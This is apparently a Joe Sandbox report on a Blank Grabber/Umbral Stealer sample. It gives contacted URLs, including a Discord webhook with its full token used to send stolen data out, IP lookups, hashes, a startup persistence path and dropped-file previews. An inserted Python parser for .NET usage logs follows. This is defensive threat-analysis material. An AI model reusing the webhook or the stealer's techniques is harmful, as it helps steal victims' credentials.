http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000005.00000002.1757050367.000001D310075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1894278502.000001BED4F48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1894278502.000001BED4E05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1817451274.000001BEC674A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2036403659.000001DE69631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2036403659.000001DE69767000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE5AE7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2266136040.000002492F6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.000002492100A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2266136040.000002492F805000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 0000000A.00000002.1817451274.000001BEC658C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE5AD47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.0000024920AF2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://discord.com/api/v10/users/ | kaS9T.scr.0.dr | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000017.00000002.2119777600.000002491F882000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000005.00000002.1740029520.000001D300228000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ptb.discord.com | zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB07B7000.00000004.00000800.00020000.00000000.sdmp, zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB073D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000017.00000002.2119777600.000002491F882000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.microsoK | powershell.exe, 00000005.00000002.1767821845.000001D36AB66000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000017.00000002.2266136040.000002492F805000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://discordapp.com/api/v9/users/ | zamPeEkHWr.exe, kaS9T.scr.0.dr | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000017.00000002.2266136040.000002492F805000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000017.00000002.2119777600.000002491F882000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Blank-c/Umbral-Stealer | kaS9T.scr.0.dr | false | Avira URL Cloud: safe | unknown
http://crl.m | powershell.exe, 00000005.00000002.1765168613.000001D36A810000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://go.microsof | powershell.exe, 00000017.00000002.2287696510.0000024937C3C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000005.00000002.1740029520.000001D300228000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000017.00000002.2266136040.000002492F805000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000005.00000002.1757050367.000001D310075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1894278502.000001BED4F48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1894278502.000001BED4E05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1817451274.000001BEC674A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2036403659.000001DE69631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2036403659.000001DE69767000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE5AE7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2266136040.000002492F6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.000002492100A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2266136040.000002492F805000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ip-api.com | zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB0357000.00000004.00000800.00020000.00000000.sdmp, zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB06A0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.orgX | powershell.exe, 0000000A.00000002.1817451274.000001BEC658C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE5AD47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.0000024920AF2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://go.microsoft.cogDy | powershell.exe, 00000008.00000002.1792975353.00000113FEC8D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N | zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB07B7000.00000004.00000800.00020000.00000000.sdmp, zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB02F1000.00000004.00000800.00020000.00000000.sdmp, zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB073D000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000005.00000002.1740029520.000001D300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1778231738.000001138005E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1778231738.000001138001D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1817451274.000001BEC4D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE595B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.000002491F651000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ip-api.com/json/?fields=225545P | zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB06A0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ptb.discord.com | zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB073D000.00000004.00000800.00020000.00000000.sdmp, zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB066C000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB02F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1740029520.000001D300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1778231738.000001138001D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1817451274.000001BEC4D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE595B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.000002491F651000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://go.m | powershell.exe, 00000017.00000002.2287696510.0000024937C3C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://oneget.org | powershell.exe, 0000000A.00000002.1817451274.000001BEC658C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE5AD47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.0000024920AF2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ip-api.com/json/?fields=225545 | zamPeEkHWr.exe, kaS9T.scr.0.dr | false | Avira URL Cloud: safe | unknown
http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806- | zamPeEkHWr.exe, kaS9T.scr.0.dr | false | Avira URL Cloud: safe | unknown
http://crl.micros | powershell.exe, 00000005.00000002.1766639509.000001D36A990000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
162.159.138.232 | ptb.discord.com | United States | 13335 | CLOUDFLARENETUS | true
                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1488036
                            Start date and time:2024-08-05 15:42:55 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 45s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:31
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:zamPeEkHWr.exe
                            renamed because original name is a hash value
                            Original Sample Name:824d0e2ebaa40b7bca3bc0657338a13df78121172fe52e604f45c8033ab7537a.exe
                            Detection:MAL
                            Classification:mal100.troj.adwa.spyw.evad.winEXE@40/23@3/2
                            EGA Information:
                            • Successful, ratio: 16.7%
                            HCA Information:
                            • Successful, ratio: 63%
                            • Number of executed functions: 325
                            • Number of non-executed functions: 24
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                            • Excluded IPs from analysis (whitelisted): 142.250.184.195
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target powershell.exe, PID 6980 because it is empty
                            • Execution Graph export aborted for target powershell.exe, PID 7644 because it is empty
                            • Execution Graph export aborted for target powershell.exe, PID 7672 because it is empty
                            • Execution Graph export aborted for target powershell.exe, PID 7888 because it is empty
                            • Execution Graph export aborted for target powershell.exe, PID 8008 because it is empty
• Not all processes were analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: zamPeEkHWr.exe
Time | Type | Description
09:43:47 | API Interceptor | 5x Sleep call for process: WMIC.exe modified
09:43:49 | API Interceptor | 30x Sleep call for process: powershell.exe modified
09:43:50 | API Interceptor | 10878x Sleep call for process: zamPeEkHWr.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | QU0094675.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | IDLBk4XMUa.exe | malicious | Blank Grabber, Umbral Stealer | ip-api.com/json/?fields=225545
208.95.112.1 | Vjy8d2EoqK.exe | malicious | Blank Grabber, DCRat, XWorm | ip-api.com/json/?fields=225545
208.95.112.1 | 3.bin.exe | malicious | Go Injector | ip-api.com/json/?fields=status,message,query,country,regionName,city,isp,timezone
208.95.112.1 | raw.ps1 | malicious | Unknown | ip-api.com/json/?fields=status,message,query,country,regionName,city,isp,timezone
208.95.112.1 | #U202f#U202f#U2005#U00a0.scr.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | NaOH.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | SSPInstallerV2.exe | malicious | Blank Grabber, Umbral Stealer, XWorm | ip-api.com/json/?fields=225545
208.95.112.1 | XWorm.V5.6.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | oc 1337.xlam.xlsx | malicious | AgentTesla | ip-api.com/line/?fields=hosting
162.159.138.232 | IDLBk4XMUa.exe | malicious | Blank Grabber, Umbral Stealer |
162.159.138.232 | http://dc.tensgpt.com/branding/ | malicious | Unknown |
162.159.138.232 | SSPInstallerV2.exe | malicious | Blank Grabber, Umbral Stealer, XWorm |
162.159.138.232 | VaTlw2kNGc.exe | malicious | Blank Grabber, DCRat, PureLog Stealer, Xmrig, zgRAT |
162.159.138.232 | Zoom_workspace.hta | malicious | Cobalt Strike, Clipboard Hijacker |
162.159.138.232 | qqgv6uKJOd.exe | malicious | Clipboard Hijacker |
162.159.138.232 | http://discord-proxy.tassadar2002.workers.dev/ | malicious | Unknown |
162.159.138.232 | http://dapi.190823.xyz/ | malicious | Unknown |
162.159.138.232 | LisectAVT_2403002A_147.exe | malicious | Blank Grabber |
162.159.138.232 | LisectAVT_2403002A_368.exe | malicious | Blank Grabber, DCRat, Umbral Stealer |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | QU0094675.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | IDLBk4XMUa.exe | malicious | Blank Grabber, Umbral Stealer | 208.95.112.1
ip-api.com | Vjy8d2EoqK.exe | malicious | Blank Grabber, DCRat, XWorm | 208.95.112.1
ip-api.com | 3.bin.exe | malicious | Go Injector | 208.95.112.1
ip-api.com | raw.ps1 | malicious | Unknown | 208.95.112.1
ip-api.com | #U202f#U202f#U2005#U00a0.scr.exe | malicious | Blank Grabber | 208.95.112.1
ip-api.com | NaOH.exe | malicious | XWorm | 208.95.112.1
ip-api.com | SSPInstallerV2.exe | malicious | Blank Grabber, Umbral Stealer, XWorm | 208.95.112.1
ip-api.com | XWorm.V5.6.exe | malicious | XWorm | 208.95.112.1
ip-api.com | oc 1337.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
ptb.discord.com | IDLBk4XMUa.exe | malicious | Blank Grabber, Umbral Stealer | 162.159.138.232
ptb.discord.com | golang-modules.exe | malicious | Unknown | 162.159.136.232
ptb.discord.com | golang-modules.exe | malicious | Unknown | 162.159.137.232
ptb.discord.com | SetupSpuckwars_1.15.5.exe | malicious | Unknown | 162.159.128.233
ptb.discord.com | SetupSpuckwars_1.15.5.exe | malicious | Unknown | 162.159.128.233
ptb.discord.com | KzqQe0QtRd.exe | malicious | Unknown | 162.159.137.232
ptb.discord.com | PAP46E1UkZ.exe | malicious | Unknown | 162.159.128.233
ptb.discord.com | A4AxThCBqS.exe | malicious | Nanocore, Luna Logger, Umbral Stealer | 162.159.136.232
ptb.discord.com | SecuriteInfo.com.Variant.Jatif.7130.11703.17675.exe | malicious | CKS Stealer, Spark RAT | 162.159.137.232
ptb.discord.com | SecuriteInfo.com.Variant.Jatif.7130.11703.17675.exe | malicious | CKS Stealer, Spark RAT | 162.159.138.232
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | http://verizonwireless-employmentvalidation.com | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | SHANDONG FU EN - PARTICULARS.xls.scr.exe | malicious | AgentTesla, PureLog Stealer | 172.67.74.152
CLOUDFLARENETUS | Bank swift.exe | malicious | Snake Keylogger | 188.114.96.3
CLOUDFLARENETUS | Hollandco Company Guidelines Employee Handbook___fdp (1).docx | malicious | Tycoon2FA | 104.21.46.160
CLOUDFLARENETUS | BPO-044634.exe | malicious | Snake Keylogger | 188.114.96.3
CLOUDFLARENETUS | Employee performance.exe | malicious | FormBook | 23.227.38.74
CLOUDFLARENETUS | https://content.app-us1.com/LedEn/2024/08/03/19c502f2-d7fc-4021-b067-e9b1cf078dac.pdf | malicious | HTMLPhisher | 104.17.31.174
CLOUDFLARENETUS | Hollandco Company Guidelines Employee Handbook___fdp (1).docx | malicious | HTMLPhisher | 104.21.46.160
CLOUDFLARENETUS | INVOICE-25738 UNIVERSAL BEARING.exe | malicious | AgentTesla | 172.67.74.152
CLOUDFLARENETUS | Invoice_No.10.exe | malicious | AgentTesla, PureLog Stealer | 172.67.74.152
TUT-ASUS | QU0094675.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
TUT-ASUS | IDLBk4XMUa.exe | malicious | Blank Grabber, Umbral Stealer | 208.95.112.1
TUT-ASUS | Vjy8d2EoqK.exe | malicious | Blank Grabber, DCRat, XWorm | 208.95.112.1
TUT-ASUS | 3.bin.exe | malicious | Go Injector | 208.95.112.1
TUT-ASUS | raw.ps1 | malicious | Unknown | 208.95.112.1
TUT-ASUS | #U202f#U202f#U2005#U00a0.scr.exe | malicious | Blank Grabber | 208.95.112.1
TUT-ASUS | NaOH.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | SSPInstallerV2.exe | malicious | Blank Grabber, Umbral Stealer, XWorm | 208.95.112.1
TUT-ASUS | XWorm.V5.6.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | oc 1337.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | SHANDONG FU EN - PARTICULARS.xls.scr.exe | malicious | AgentTesla, PureLog Stealer | 162.159.138.232
3b5074b1b5d032e5620f69f9f700ff0e | INVOICE-25738 UNIVERSAL BEARING.exe | malicious | AgentTesla | 162.159.138.232
3b5074b1b5d032e5620f69f9f700ff0e | Invoice_No.10.exe | malicious | AgentTesla, PureLog Stealer | 162.159.138.232
3b5074b1b5d032e5620f69f9f700ff0e | Original copy of Bill of Lading, Invoice, PDA.bat.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 162.159.138.232
3b5074b1b5d032e5620f69f9f700ff0e | Payment Advice-DPEB08-2SDC - SS25 Price C246SH32.exe | malicious | AgentTesla, DarkTortilla | 162.159.138.232
3b5074b1b5d032e5620f69f9f700ff0e | PO#86637 copy.exe | malicious | AgentTesla, PureLog Stealer | 162.159.138.232
3b5074b1b5d032e5620f69f9f700ff0e | RFQ-010922-0725-ZA.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 162.159.138.232
3b5074b1b5d032e5620f69f9f700ff0e | IDLBk4XMUa.exe | malicious | Blank Grabber, Umbral Stealer | 162.159.138.232
3b5074b1b5d032e5620f69f9f700ff0e | 7vwoFTXTwe.exe | malicious | Snake Keylogger, VIP Keylogger | 162.159.138.232
3b5074b1b5d032e5620f69f9f700ff0e | Vjy8d2EoqK.exe | malicious | Blank Grabber, DCRat, XWorm | 162.159.138.232
                                                No context
                                                Process:C:\Users\user\Desktop\zamPeEkHWr.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):232448
                                                Entropy (8bit):6.020784348942329
                                                Encrypted:false
                                                SSDEEP:6144:eloZM3fsXtioRkts/cnnK6cMluDdCFzQEb0CzFQMpnhb8e1msQci:IoZ1tlRk83MluDdCFzQEb0CzFQMpZ3K
                                                MD5:EF323A7483653FFB1FC4FF036576E065
                                                SHA1:80E63B57A7AD6394F778C7AA5A855520F1533589
                                                SHA-256:824D0E2EBAA40B7BCA3BC0657338A13DF78121172FE52E604F45C8033AB7537A
                                                SHA-512:04785049F73ACBACC2B0EA89E2BBC547AC6FA302EAC4CBBD895F8D6A873C8B0DCFA8A8762D90847C9A0BF28862E12B294CB70F073019A6046BAC104B9189BA7E
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr, Author: Joe Security
                                                • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr, Author: Joe Security
• Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attempting to enumerate video devices using WMI, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr, Author: ditekSHen
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 82%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0................. ........@.. ....................................`.....................................O.......P............................................................................ ............... ..H............text....... ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B.......................H.......@...@.......6.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*...0..w.............%.o...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~...
                                                Process:C:\Users\user\Desktop\zamPeEkHWr.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Preview:[ZoneTransfer]....ZoneId=0
                                                Process:C:\Users\user\Desktop\zamPeEkHWr.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):1965
                                                Entropy (8bit):5.377802142292312
                                                Encrypted:false
                                                SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHhAHKKkpLHDJHqHGHK+HKs:iq+wmj0qCYqGSI6owJtzHeqKkpLVKmqs
                                                MD5:582A844EB067319F705A5ADF155DBEB0
                                                SHA1:68B791E0F77249BF83CD4B23A6C4A773365E2CAD
                                                SHA-256:E489CF4E6C01EFE8827F172607D7E3CD89C4870B0B0CA5A33EFE64577E2CB8A9
                                                SHA-512:6F530A0E2D3910459AFEFD0295ACA93D3814AB98D9A6E2BE1C2B8B717F075C87EF908BBF955E38F7B976EC51ED512645D13D0FB60AC865867E573060C5D76B59
                                                Malicious:true
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System
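The 1965-byte "modified" text file above has the line format of the per-executable assembly usage log that the .NET Framework 4 runtime keeps under the user profile (%LOCALAPPDATA%\Microsoft\CLR_v4.0\UsageLogs): one `3,"<assembly display name>","<native image path>",<flag>` record per assembly the process bound. Such logs survive on disk after the process exits, so they tell a responder which framework pieces a .NET stealer actually used. The following parser is an added example, not code from the report or from the malware; SAMPLE_LOG is constructed from the preview (CR/LF restored where the preview prints `..`; the fifth record, which the preview cuts off, is omitted), and the capability hints are this example's own heuristic.

```python
"""Parse a .NET 4 CLR assembly usage log and list the assemblies bound.

Added example, not part of the Joe Sandbox report. SAMPLE_LOG is constructed
from the report's preview of the 'modified' text file.
"""
import csv
import re

SAMPLE_LOG = (
    '1,"fusion","GAC",0\r\n'
    '1,"WinRT","NotApp",1\r\n'
    '3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\b187b7f31cee3e87b56c8edca55324e0\\System.ni.dll",0\r\n'
    '3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Drawing\\567ff6b0de7f9dcd8111001e94ab7cf6\\System.Drawing.ni.dll",0\r\n'
    '3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Windows.Forms\\2a7fffeef3976b2a6f273db66b1f0107\\System.Windows.Forms.ni.dll",0\r\n'
    '3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\31326613607f69254f3284ec964796c8\\System.Core.ni.dll",0\r\n'
)

# Strong-name display name: "<name>, Version=<v>, Culture=<c>, PublicKeyToken=<hex|null>"
DISPLAY_NAME = re.compile(
    r"^(?P<name>[^,]+), Version=(?P<version>[^,]+), Culture=(?P<culture>[^,]+), "
    r"PublicKeyToken=(?P<token>[0-9a-fA-F]+|null)$"
)

# Heuristic (this example's own): what a stealer typically needs these framework assemblies for.
HINTS = {
    "System.Net.Http": "HTTP client: exfiltration or webhook/C2 traffic",
    "System.Drawing": "bitmap handling: screenshots",
    "System.Windows.Forms": "Screen/Clipboard APIs: screen geometry, clipboard capture",
    "System.Core": "LINQ and extended crypto/IO helpers (no signal on its own)",
}


def parse_usage_log(text):
    """Return one dict per assembly-bind record (record type 3 as observed in these logs)."""
    entries = []
    # The display name contains commas, so let csv handle the quoting.
    for row in csv.reader(text.splitlines()):
        if len(row) != 4 or row[0] != "3":
            continue
        m = DISPLAY_NAME.match(row[1])
        if not m:
            continue
        entries.append({
            "name": m.group("name"),
            "version": m.group("version"),
            "culture": m.group("culture"),
            "public_key_token": m.group("token"),
            "native_image": row[2],   # path of the NGEN image that satisfied the bind
            "flag": int(row[3]),
        })
    return entries


def capability_hints(entries):
    """Map bound assemblies to the heuristic hints above; unknown assemblies are skipped."""
    return {e["name"]: HINTS[e["name"]] for e in entries if e["name"] in HINTS}


if __name__ == "__main__":
    for e in parse_usage_log(SAMPLE_LOG):
        print(f'{e["name"]:<22} {e["version"]:<8} {e["public_key_token"]}  {e["native_image"]}')
    for name, hint in capability_hints(parse_usage_log(SAMPLE_LOG)).items():
        print(f"{name}: {hint}")
```

The same parser runs unchanged on a log collected from a victim host; the interesting signal is usually the presence of networking and imaging assemblies in a process that has no business using them.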
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):0.34726597513537405
                                                Encrypted:false
                                                SSDEEP:3:Nlll:Nll
                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                Malicious:false
                                                Preview:@...e...........................................................
                                                Process:C:\Users\user\Desktop\zamPeEkHWr.exe
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):654155
                                                Entropy (8bit):7.998161685761209
                                                Encrypted:true
                                                SSDEEP:12288:KJRwvLVs2hjIoZcuDu8hrf0xmNOWswPJBgaUq4ucu6WJwBkBv/Wh/MgIwWdU:pvCNJG7BghH66ywBauh/MgIwSU
                                                MD5:F91F5B81E2704E961CA97645225F7953
                                                SHA1:4FD698BBFCD486FB4989940178054E11C82F934A
